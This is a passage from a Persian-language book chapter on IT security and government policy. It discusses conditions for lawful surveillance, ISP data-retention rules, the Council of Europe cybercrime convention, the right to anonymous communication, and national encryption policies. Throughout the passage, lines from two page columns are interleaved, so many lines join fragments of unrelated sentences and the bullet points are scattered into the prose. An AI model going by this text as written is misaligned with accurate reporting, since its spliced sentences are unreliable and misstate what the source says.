‫ﻛﺘﺒﻲ ﻭ ﺍﺭﺍﺋﻪ ﺩﻻﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻌﺘﺒﺮ ﻭ ﻗﺎﺑـﻞ ﻗﺒـﻮﻝ ﺍﻧﺠـﺎﻡ‬
‫ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ )ﺍﺯ ﺟﻤﻠﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺿﻮﺍﺑﻂ‬
‫ﺷﻮﺩ؛‬
‫ﺧﺎﺻﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺗﻠﻔﻨﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺍﻋﻤﺎﻝ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﺩﺭ ﺑﻌﻀﻲ‬
‫ﻛﺸﻮﺭﻫﺎ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )‪ISP‬ﻫـﺎ(‪ ٨٧‬ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ‬ ‫ﻧﻈﺎﺭﺕ ﺗﻨﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﺩﺭﮔﻴﺮﻳﻬـﺎﻱ ﺟـﺪﻱ ﻭ‬ ‫•‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟﺖ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ‬ ‫ﺧﺎﺹ ﺑﺎﺷﺪ؛‬
‫ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺩﺭﺻﺪﺩ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮ‬ ‫ﺗﺄﻳﻴﺪ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﺩﻻﻳﻞ ﻗـﻮﻱ ﻛـﻪ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ‬ ‫•‬
‫ﻣﺒﻨﺎﻱ ﺁﻥ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻠﺰﻡ ﺑـﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎﻱ‬ ‫ﻟﺰﻭﻡ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﻩ ﺗﺨﻠﻔﺎﺕ ﺍﺳﺖ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ؛‬
‫ﺗﺮﺍﻓﻴﻜﻲ ﺩﺭ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺮﺍﻱ ﻳﻚ ﺣﺪﺍﻗﻞ ﺯﻣﺎﻧﻲ ﻣﻲﺑﺎﺷﻨﺪ‬
‫ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺗﻨﻬﺎ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫•‬
‫)ﺿﺎﺑﻄﻪﺍﻱ ﻛﻪ ﺑﻪ ﺁﻥ "ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ" ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ(‪ .‬ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ‬
‫ﺳﺎﻳﺮ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛‬
‫ﺑﺴﻴﺎﺭ ﺑﺤﺚﺑﺮﺍﻧﮕﻴﺰ ﺑﻮﺩﻩ ﻭ ﺑـﻪ ﻋﻠـﺖ ﺗﻬﺪﻳـﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﺷﻬﺮﻭﻧﺪﺍﻥ‪ ،‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺗﺤﻤﻴﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ‬ ‫ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻧـﺪ ﺑـﺎ‬ ‫•‬
‫ﺑﺮ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ‪ ،‬ﻣﻮﺭﺩ ﺍﻧﺘﻘﺎﺩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ‪ .‬ﺑﺮﺭﺳـﻲ‬ ‫ﺟﺰﺋﻴﺎﺕ ﻛﺎﻣﻞ ﻣﺸﺨﺺ ﺷﻮﻧﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﺧـﺼﻮﺹ ﻣـﻮﺍﺭﺩ‬
‫ﻛﺎﻣﻠﺘﺮ ﺿﻮﺍﺑﻂ ﻧﻈﺎﺭﺕ‪ ،‬ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳـﻦ‬ ‫ﻛﻠﻲ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﻧﺒﺎﺷﻨﺪ؛‬
‫ﻭﺟﻮﺩ ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛـﻪ ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﺿﻮﺍﺑﻂ ﺍﺯ ﻧﻈﺮ ﻓﻨﺎﻭﺭﻱ ﺧﻨﺜﻲ ﺑﺎﺷﻨﺪ )ﺑﺎ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻋـﻢ‬ ‫•‬
‫ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ‪ ،‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬ ‫ﺍﺯ ﺗﻠﻔﻨﻲ‪ ،‬ﺗﺼﻮﻳﺮﻱ‪ ،‬ﺩﺍﺩﻩ ﺧﻄﻮﻁ ﺳـﻴﻤﻲ ﻳـﺎﺑﻲ ﺳـﻴﻢ‪ ،‬ﺩﻳﺠﻴﺘـﺎﻝ ﻳـﺎ‬
‫ﻓﻨﻲ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺤﻤﻴـﻞ ﻧﻤـﻲﻛﻨـﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﺁﻧﺎﻟﻮﮒ‪ ،‬ﺑﻪ ﻳﻚ ﺷﻜﻞ ﺑﺮﺧﻮﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ(؛‬
‫ﻣﻌﺎﻫﺪﻩ ﺗﻨﻬﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ‪ ،‬ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﺩﺳـﺘﻴﺎﺑﻲ‬
‫ﺣﻮﺯﻩ ﻭ ﻣﺪﺕﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﻧﻈﺎﺭﺕ ﻣﺤﺪﻭﺩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻫـﻴﭻ‬ ‫•‬
‫ﺑﻪﺩﺍﺩﻩﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﻣﻮﺭﺩﻱ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺯﻣﺎﻥ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺷﺮﻛﺘﻬﺎ ﺑﻬـﺮﻩ ﻣـﻲﺑـﺮﺩ‪ .‬ﺍﻳـﻦ ﺍﻣـﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﺗﻐﻴﻴـﺮ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﺒﺎﺷﺪ؛‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ‪ .‬ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﺩﺭﺑـﺎﺭﺓ‬
‫ﻣﺴﺎﺋﻞ ﺧـﺼﻮﺻﻲ ﺩﺭ ﺣـﻮﺯﺓ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻲ ﻣﻨﺘـﺸﺮ‬ ‫ﻞ ﻧﻘـﺾ ﺣـﺮﻳﻢ‬
‫ﻧﻈﺎﺭﺗﻬﺎ ﺑﻪ ﻃﺮﻳﻘﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺣﺪﺍﻗ ﹺ‬ ‫•‬
‫ﺳﺎﺧﺖ ﻛـﻪ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳـﺎﻳﻞ‬ ‫ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬
‫ﻧﮕﻬــﺪﺍﺭﻱ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﻣــﻲﺩﺍﺩ‪ ،‬ﺍﻣــﺎ ﺁﻧﻬــﺎ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ ﺍﻳﻨﻜــﺎﺭ‬ ‫ﻗﻮﺍﻧﻴﻦ‪ ،‬ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ ﺣﺎﺻـﻞ ﺍﺯ ﺭﺩﻳـﺎﺑﻲ ﺭﺍ ﺗﻮﺿـﻴﺢ‬ ‫•‬
‫ﻧﻤﻲﺳﺎﺧﺖ‪.‬‬ ‫ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ؛ ﻭ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺩﻳﮕـﺮﻱ ﺑﻜـﺎﺭ‬
‫ﻧﺮﻭﻧﺪ؛‬
‫ﻗﺎﻧﻮﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻـﺪﻭﺭ ﺣﻜـﻢ ﺑـﺮﺍﻱ ﻣـﺘﻬﻢ ﺭﺍ ﻣـﺸﺨﺺ‬ ‫•‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﺪ؛‬
‫‪87‬‬ ‫‪Internet Service Providers‬‬
‫‪٢٥١‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫‪٨٨‬‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺩﺭ ﺧــﻂﻣــﺸﻲﻫــﺎﻱ ﺳــﺎﻝ ‪ OECD ۱۹۹۷‬ﻭ ﺩﺭ‬ ‫ﮔﻤﻨﺎﻣﻲ‬
‫ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻧﺎﻣﺤـﺪﻭﺩ‬
‫ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺣـﻖ ﻣﻬـﻢ‬
‫ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻭ ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﺷﺪﺕ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻩ ﺍﺳﺖ‪ :‬ﺣـﻖ‬
‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ‪ ۱۹۹۰‬ﻛﺸﻮﺭﻫﺎﻱ ﻛﺎﻧﺎﺩﺍ‪ ،‬ﺁﻟﻤﺎﻥ‪ ،‬ﺍﻳﺮﻟﻨـﺪ ﻭ ﻓﻨﻼﻧـﺪ‬ ‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺼﻮﺭﺕ ﮔﻤﻨـﺎﻡ‪ .٨٩‬ﮔـﺰﺍﺭﺵ ﺗﻔـﺴﻴﺮﻱ ﺍﻳـﻦ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ‪OECD‬‬ ‫ﻣﻌﺎﻫﺪﻩ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺗﻮﻗـﻊ‬
‫ﺗﻬﻴﻪ ﻛﺮﺩﻧﺪ‪ ،‬ﺗﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺭﺍﻳﮕﺎﻥ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻤـﻚ ﻛـﺮﺩﻩ‬ ‫ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺛﺒﺖ ﻧـﺎﻡ ﻣـﺸﺘﺮﻛﻴﻦ ﺧـﻮﺩ ﺭﺍ ﻧـﺪﺍﺭﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﻪ‬
‫ﺑﺎﺷــﻨﺪ‪ .‬ﻓﺮﺍﻧــﺴﻪ ﻛــﻪ ﺳــﺎﺑﻘﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺩﺭ ﻣﺤــﺪﻭﺩﻛﺮﺩﻥ‬ ‫ﻣﻮﺟﺐ ﺍﻳﻦ ﻣﻌﺎﻫـﺪﻩ‪ ،‬ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﺛﺒـﺖ‬
‫ﻼ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺷﺖ ﺩﺭ ﮊﺍﻧﻮﻳﻪ ﺳﺎﻝ ‪ ۱۹۹۹‬ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺭﺍ ﻛـﺎﻣ ﹰ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺘﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺸﺘﺮﻛﻴﻦ ﻭ ﻳﺎ ﻣﻘﺎﻭﻣـﺖ ﺩﺭ‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﻭ ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﻣﺤـﺪﻭﻳﺖ‬ ‫ﺑﺮﺍﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻣﺴﺘﻌﺎﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺷـﻮﺭﺍﻱ‬
‫ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺩﺭ ﺩﺳﺎﻣﺒﺮ ‪ ،۱۹۹۷‬ﺑﻠﮋﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﻝ ‪ ۱۹۹۴‬ﺧـﻮﺩ‬ ‫ﺍﺭﻭﭘــﺎ ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۳‬ﺑﻴﺎﻧﻴــﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﺁﺯﺍﺩﻱ ﺍﺭﺗﺒﺎﻃــﺎﺕ‬
‫ﺩﺭ ﺧﺼﻮﺹ ﻣﺤﺪﻭﺩﻳﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺍﺻـﻼﺡ ﻧﻤـﻮﺩ‪ .‬ﺍﻳـﺎﻻﺕ‬ ‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎ ﺍﻳﻦ ﻣﻀﻤﻮﻥ ﺑـﻪ ﭼـﺎﭖ ﺭﺳـﺎﻧﺪ‪" :‬ﺑﻤﻨﻈـﻮﺭ ﺍﻓـﺰﺍﻳﺶ‬
‫ﻣﺘﺤﺪﻩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﺠﺎﺭﺕ ﻣﺤﺼﻮﻻﺕ ﻭ‬ ‫ﺍﻧﺘﺸﺎﺭ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﺪﻩﻫﺎ‪ ،‬ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻳـﺪﺓ‬
‫ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺑﻮﺩ‪ ،‬ﺗﻤﺎﻣﻲ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺍﻳﻦ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻧﺪ ﻭ ﻧـﻪ ﻫﻮﻳـﺖ ﺁﻧـﺎﻥ"‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‪،‬‬
‫ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺭﻓﻊ ﻛﺮﺩ‪.‬‬ ‫ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺑﺼﻮﺭﺕ ﮔﻤﻨﺎﻡ ﺭﺍ‬
‫ﺑﻪ ﺭﺳﻤﻴﺖ ﺷﻨﺎﺧﺖ ﻭ ﺑﺎ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﻳﺠـﺎﺩ‬
‫ﻗﺎﻧﻮﻥ ﻭ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ‬ ‫ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻣﻦﺗﺮ ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ‪" :‬ﮔﻮﻧـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻩﺍﻧـﺪ‬ ‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﺑـﺎ‬
‫ﻛﻪ ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣـﺆﺛﺮ ﺗﻬﺪﻳـﺪﺍﺕ‬ ‫ﺁﻥ ﺗﻌﺎﻣﻞ ﺩﺍﺭﻳﻢ ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ﻭ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ‬ ‫ﻻﺯﻡ ﺑﺎﺷــﺪ ﻳــﺎ ﺗــﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷــﻮﺩ ﻛــﻪ ﮔﻤﻨــﺎﻡ ﺑــﺎﻗﻲ ﺑﻤــﺎﻧﻴﻢ‪".‬‬
‫ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻄﺎﻟﻌـﺎﺕ ﺷـﺒﻜﻪ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺳـﺎﻝ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﻳﺎﺩﺁﻭﺭ ﺷﺪ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﻧﻴﺰ ﺩﺭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺿﺮﻭﺭﻱ ﻣـﻲﺑﺎﺷـﺪ‪،‬‬


‫ﭼﺮﺍﻛﻪ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺍﻧﮕﻴﺰﺓ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ ﺑـﺬﻝ ﺗﻮﺟـﻪ ﻻﺯﻡ ﺑـﻪ‬ ‫‪ ۲۰۰۱‬ﺧﻮﺩ‪ ،‬ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ٩٠‬ﺩﺭ ﺷﺒﻜﻪ ﻧﻴـﺰ ﺑﺎﻳـﺪ‬
‫ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ‪ :‬ﻗﻴﻤﺘﻬﺎﻱ ﺑﺎﺯﺍﺭ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﺯﺗـﺎﺏ‬ ‫ﺍﻣﻜﺎﻥ ﮔﻤﻨﺎﻡ ﻣﺎﻧﺪﻥ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺩﻗﻴﻖ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﺳﺮﻣﺎﻳﻪ ﮔـﺬﺍﺭﻱ ﺑـﺮ ﺭﻭﻱ ﺍﻣﻨﻴـﺖ ﻧﻴـﺴﺖ؛ ﻭ‬ ‫ﺧﺪﻣﺎﺕ ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﻣﺸﺨﺺ ﺷﻮﺩ‪".‬‬
‫ﻻ ﻧـﻪ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻧـﻪ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﻫﻴﭽﻜـﺪﺍﻡ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻡ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺭﻛـﻮﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﻲﺗـﻮﺟﻬﻲ ﺑـﻪ‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺗﺤﻤﻞ ﻛﻨﻨـﺪ؛ ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕـﺮ ﻛﻨﺘـﺮﻝ ﺑـﺮ‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ٩١‬ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﭘﺮﺍﻛﻨﺪﻩ ﺍﺳﺖ ﻭ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﭘﻴﭽﻴﺪﮔﻲ ﺷـﺒﻜﻪﻫـﺎ‪،‬‬ ‫ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ ﺩﺭ ﺳـﺎﻝ ‪ ،۲۰۰۱‬ﻣﺘـﺬﻛﺮ ﺷـﺪ‪:‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ‬ ‫"ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑـﻮﻳﮋﻩ ﺑـﺎ ﺭﺷـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺷﺪﻳﺪﻱ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫ﺑﻲﺳﻴﻢ ﺿﺮﻭﺭﻱ ﺍﺳـﺖ"‪ .‬ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻳـﻦ ﺍﻣـﺮ‪ ،‬ﺭﻭﻧـﺪ ﻛﻠـﻲ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺍﺭﻧــﺪ‪ ،‬ﺍﺯ ﺗﺎﺭﻳﺨﭽــﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ‪ -‬ﻧﻈﻴــﺮ‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺩﺭ ﺧﺼﻮﺹ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻳـﺪ ﻗـﻮﺍﻧﻴﻦ ﻣﺤـﺪﻭﺩ‬
